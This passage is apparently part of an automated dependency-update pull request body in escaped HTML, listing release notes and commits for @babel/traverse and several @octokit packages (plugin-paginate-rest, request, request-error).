href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/781\"\u003e#781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e\u003ccode\u003e1aeac56\u003c/code\u003e\u003c/a\u003e fix(deps): update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/request.js/compare/v5.6.3...v10.0.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​octokit/request\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request-error` from 2.1.0 to 7.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request-error.js/releases\"\u003e\u003ccode\u003e@​octokit/request-error\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/request-error.js/compare/v7.0.2...v7.1.0\"\u003e7.1.0\u003c/a\u003e 